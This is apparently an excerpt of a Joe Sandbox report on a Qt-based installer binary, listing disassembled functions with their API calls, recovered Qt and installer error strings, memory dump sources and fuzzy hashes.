                                                                                                            • Opcode Fuzzy Hash: fbb40cb443b62ef76b6fe11cfc7c183a3fd50678cfabd96f63920300b1c2c469
                                                                                                            • Instruction Fuzzy Hash: 943163B1644305AFE320DF65CC85F6BB7ECEB88B44F00492DF699D7280D6B1E9048B66
                                                                                                            APIs
                                                                                                              • Part of subcall function 0078A2D0: __CxxThrowException@8.LIBCMT ref: 0078A40B
                                                                                                            • ?importFile@Directives@QQmlJS@@UAEXABVQString@@0@Z.BDXSBR8DCE(00000000,00000001,?,?,?,QResources,?,00000000,?,?,99D668F9), ref: 0078AC8F
                                                                                                            • ?pragmaLibrary@Directives@QQmlJS@@UAEXXZ.BDXSBR8DCE(?,00000000,?,?,?,QResources,?,00000000,?,?,99D668F9), ref: 0078AC9A
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0078AE28
                                                                                                            Strings
                                                                                                            • BinaryContent, xrefs: 0078ADDA, 0078AFE9
                                                                                                            • Could not seek to %1 to read the operation data., xrefs: 0078ADD1
                                                                                                            • Could not seek to %1 to read the resource collection block., xrefs: 0078AFE0
                                                                                                            • QResources, xrefs: 0078AB56
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directives@Exception@8Throw$?import?pragmaFile@Library@String@@0@
                                                                                                            • String ID: BinaryContent$Could not seek to %1 to read the operation data.$Could not seek to %1 to read the resource collection block.$QResources
                                                                                                            • API String ID: 3461464008-3054409910
                                                                                                            • Opcode ID: 4f95106ec07862d60f4a7f81bfd9e57954758677b0e652c7ea080c817db498e3
                                                                                                            • Instruction ID: 090b1126a8b0fe2e04ff1b7a368bd384eb2f3c5f225fc08252217828ec152c0a
                                                                                                            • Opcode Fuzzy Hash: 4f95106ec07862d60f4a7f81bfd9e57954758677b0e652c7ea080c817db498e3
                                                                                                            • Instruction Fuzzy Hash: 88F10470649341ABE730EF28C841B5BB7E5AF85724F040A1EF5999B291EB78DC05CB63
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 00F9EEF8
                                                                                                              • Part of subcall function 01107314: _malloc.LIBCMT ref: 01107320
                                                                                                            • z_uncompress.BDXSBR8DCE(?,?,00000006,?,?,00000000), ref: 00F9EE7E
                                                                                                              • Part of subcall function 01085F90: z_inflateInit_.BDXSBR8DCE ref: 01085FD2
                                                                                                              • Part of subcall function 01085F90: z_inflate.BDXSBR8DCE(?,00000004,?,1.2.5,00000038), ref: 01085FE6
                                                                                                              • Part of subcall function 01085F90: z_inflateEnd.BDXSBR8DCE(?,?,?,1.2.5,00000038), ref: 01085FFA
                                                                                                            • _free.LIBCMT ref: 00F9EF62
                                                                                                            Strings
                                                                                                            • qUncompress: Z_DATA_ERROR: Input data is corrupted, xrefs: 00F9F05C
                                                                                                            • qUncompress: Input data is corrupted, xrefs: 00F9EDCE, 00F9EEBB, 00F9EF49
                                                                                                            • qUncompress: Z_MEM_ERROR: Not enough memory, xrefs: 00F9F038
                                                                                                            • qUncompress: Data is null, xrefs: 00F9ED5D
                                                                                                            • qUncompress: could not allocate enough memory to uncompress data, xrefs: 00F9EFAE, 00F9F066
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: z_inflate$_free$Init__mallocz_uncompress
                                                                                                            • String ID: qUncompress: Data is null$qUncompress: Input data is corrupted$qUncompress: Z_DATA_ERROR: Input data is corrupted$qUncompress: Z_MEM_ERROR: Not enough memory$qUncompress: could not allocate enough memory to uncompress data
                                                                                                            • API String ID: 3985010597-2141902988
                                                                                                            • Opcode ID: e3949389c60a37fa08cb464412947e8bf31b7fa91afc2012e0cf94873f25b6b4
                                                                                                            • Instruction ID: 2f0fc77f897745ce92d60a7e365b3ee5a1cb5ed5654ec31081e3e368bfbbeb13
                                                                                                            • Opcode Fuzzy Hash: e3949389c60a37fa08cb464412947e8bf31b7fa91afc2012e0cf94873f25b6b4
                                                                                                            • Instruction Fuzzy Hash: 3A81E5B29087818FEB24CF18C841BAAF7E5FF84718F14491EE8D887341E7759548DB92
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memmove
                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$string too long
                                                                                                            • API String ID: 4104443479-3027263635
                                                                                                            • Opcode ID: ba2a2ba32996fa1edd1b6b164bffca57519bd8b46d078613ab6ed062ebd483a8
                                                                                                            • Instruction ID: bb9ee69d6fb6f2449aed8dafc3d0118139001d2da3e241478bd28b1a8db9672c
                                                                                                            • Opcode Fuzzy Hash: ba2a2ba32996fa1edd1b6b164bffca57519bd8b46d078613ab6ed062ebd483a8
                                                                                                            • Instruction Fuzzy Hash: F75136713043109BDB25DA18C845E5EB7E9EBA0B90F50C82EF589DB292D379DD14D3A2
                                                                                                            APIs
                                                                                                            • __beginthreadex.LIBCMT ref: 00FE58D7
                                                                                                              • Part of subcall function 00FE6540: GetCurrentThreadId.KERNEL32 ref: 00FE6563
                                                                                                            • GetCurrentThread.KERNEL32 ref: 00FE5944
                                                                                                            • GetThreadPriority.KERNEL32(00000000), ref: 00FE594B
                                                                                                            • SetThreadPriority.KERNEL32(?,00000000), ref: 00FE5955
                                                                                                            • ResumeThread.KERNEL32(?), ref: 00FE596F
                                                                                                            Strings
                                                                                                            • QThread::start: Failed to resume new thread, xrefs: 00FE597A
                                                                                                            • QThread::start: Failed to set thread priority, xrefs: 00FE595F
                                                                                                            • QThread::start: Failed to create thread, xrefs: 00FE58EB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CurrentPriority$Resume__beginthreadex
                                                                                                            • String ID: QThread::start: Failed to create thread$QThread::start: Failed to resume new thread$QThread::start: Failed to set thread priority
                                                                                                            • API String ID: 3770019071-3963483154
                                                                                                            • Opcode ID: 3bf594c145ecdce13b34ffd5cd3fc233c557433d646effdece022036c0cb45ea
                                                                                                            • Instruction ID: 4b366ff54604dd1ea27c25f9de1d1e5dbd66fc5cb2bbbb5ac1405384dfd2b031
                                                                                                            • Opcode Fuzzy Hash: 3bf594c145ecdce13b34ffd5cd3fc233c557433d646effdece022036c0cb45ea
                                                                                                            • Instruction Fuzzy Hash: 6D41F671A08F81DBD7209F26DC4576A76E1EB40B3CF24062DF5A2866D2D7B5D804B712
                                                                                                            APIs
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0078A40B
                                                                                                              • Part of subcall function 011041A5: RaiseException.KERNEL32(?,?,00000001,01579490,?,?,?,?,?,00F70BE2,00000001,01579490), ref: 011041FA
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0078A4B2
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0078A779
                                                                                                            Strings
                                                                                                            • Could not seek to %1 to read the embedded meta data count., xrefs: 0078A3B4
                                                                                                            • Unexpected mismatch of meta resources. Read %1, expected: %2., xrefs: 0078A702
                                                                                                            • Could not seek to %1 to read the resource collection segment., xrefs: 0078A458
                                                                                                            • BinaryLayout, xrefs: 0078A3BD, 0078A461, 0078A70B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                            • String ID: BinaryLayout$Could not seek to %1 to read the embedded meta data count.$Could not seek to %1 to read the resource collection segment.$Unexpected mismatch of meta resources. Read %1, expected: %2.
                                                                                                            • API String ID: 3476068407-2009124147
                                                                                                            • Opcode ID: e8f39a5ce79e9db2cde4a229000da246b54d76fab8d15ef78a6ac0db092bb359
                                                                                                            • Instruction ID: 878587cfb09cd059ec5cf67ff219298c06c65e49ef8c3118c8555988c5e78b29
                                                                                                            • Opcode Fuzzy Hash: e8f39a5ce79e9db2cde4a229000da246b54d76fab8d15ef78a6ac0db092bb359
                                                                                                            • Instruction Fuzzy Hash: E2E1BF70644300AFDB14EF28C895B1ABBE4FF48314F14465DF9599B396E779E804CB92
                                                                                                            APIs
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 007C292E
                                                                                                              • Part of subcall function 011041A5: RaiseException.KERNEL32(?,?,00000001,01579490,?,?,?,?,?,00F70BE2,00000001,01579490), ref: 011041FA
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 007C2CC6
                                                                                                            Strings
                                                                                                            • Unknown error., xrefs: 007C2C03
                                                                                                            • ; if (typeof %1 != "undefined") return new %1; else throw "Missing Component constructor. Please check your script.";})();, xrefs: 007C2939
                                                                                                            • Uuid, xrefs: 007C2B2D
                                                                                                            • Exception while loading the component script '%1'. (%2), xrefs: 007C2C80
                                                                                                            • Could not open the requested script file at %1: %2., xrefs: 007C28EE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                                            • String ID: ; if (typeof %1 != "undefined") return new %1; else throw "Missing Component constructor. Please check your script.";})();$Could not open the requested script file at %1: %2.$Exception while loading the component script '%1'. (%2)$Unknown error.$Uuid
                                                                                                            • API String ID: 3476068407-3056430104
                                                                                                            • Opcode ID: 1965c7e1d07f3175d321320776ff621062ecf361e585933a41525dd8f22467ea
                                                                                                            • Instruction ID: 5b24de32dc9487f0f4de504c5bd39c076111a1581dc00dd56aa490261c83d795
                                                                                                            • Opcode Fuzzy Hash: 1965c7e1d07f3175d321320776ff621062ecf361e585933a41525dd8f22467ea
                                                                                                            • Instruction Fuzzy Hash: C2D1E1B06083409BD724DB24D845F9FB7E8AF86724F04491DF999973C2EB789809CB63
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Cannot open file %1 for writing: %2$QInstaller$Read failed after %1 bytes: %2$Write failed after %1 bytes: %2
                                                                                                            • API String ID: 0-4155000749
                                                                                                            • Opcode ID: a8402ab0f5877b14c753dc86612fc029330ba301fc7984eba31568921a78c7f3
                                                                                                            • Instruction ID: 228ffbeffb15e709eebaba37187cf3bb5f265623745045328cee313074860e07
                                                                                                            • Opcode Fuzzy Hash: a8402ab0f5877b14c753dc86612fc029330ba301fc7984eba31568921a78c7f3
                                                                                                            • Instruction Fuzzy Hash: C691E572248340ABD714EB69CC85F5BBBE9EBC9760F440A2DF855D3381EB79E8048752
                                                                                                            APIs
                                                                                                            • __wsystem.LIBCMT ref: 00783A3B
                                                                                                              • Part of subcall function 0110513F: __access_s.LIBCMT ref: 0110518E
                                                                                                              • Part of subcall function 0110513F: _free.LIBCMT ref: 01105211
                                                                                                            • GetConsoleWindow.KERNEL32(00000100,0000000D,00000000,EA29BAA6,?,?,?,?,0112D5F9,000000FF,00772E4E), ref: 00783A4E
                                                                                                            • PostMessageW.USER32(00000000), ref: 00783A55
                                                                                                            • FreeConsole.KERNEL32 ref: 00783ABD
                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00783B16
                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00783B6E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleIos_base_dtorstd::ios_base::_$FreeMessagePostWindow__access_s__wsystem_free
                                                                                                            • String ID: PAUSE
                                                                                                            • API String ID: 1951553317-550391901
                                                                                                            • Opcode ID: a87eb0e26667690fc5d9d3bcb0c2e47dd2593ad121368fcda2a45c5f64522789
                                                                                                            • Instruction ID: c5fabe5ab37e33ebabc4f1d1b24f04a906e13b41f3f7ee7ee582c32e17b6aadd
                                                                                                            • Opcode Fuzzy Hash: a87eb0e26667690fc5d9d3bcb0c2e47dd2593ad121368fcda2a45c5f64522789
                                                                                                            • Instruction Fuzzy Hash: C3417BB4600246CFE728DF19C988B96BBE4FF44708F14859DE49A8B391D736E906CB81
                                                                                                            APIs
                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 00F78AD2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                            • String ID: in $QObject::%s: No such %s %s::%s%s%s$QObject::%s: Parentheses expected, %s %s::%s%s%s$method$signal$slot
                                                                                                            • API String ID: 601868998-3821009087
                                                                                                            • Opcode ID: bbbfdcd64eefa96afc8064308f4cad5e2021f9f8a991c1bfa81e62bee1daf784
                                                                                                            • Instruction ID: 86246e64e1cafc4f94ed1c24512c0700138ff8901dd592326cd72a204a3d33de
                                                                                                            • Opcode Fuzzy Hash: bbbfdcd64eefa96afc8064308f4cad5e2021f9f8a991c1bfa81e62bee1daf784
                                                                                                            • Instruction Fuzzy Hash: D5212672B043006BCB049A698C85D5B77EDEFCC258F00483EF549D7251EA29ED0997A2
                                                                                                            APIs
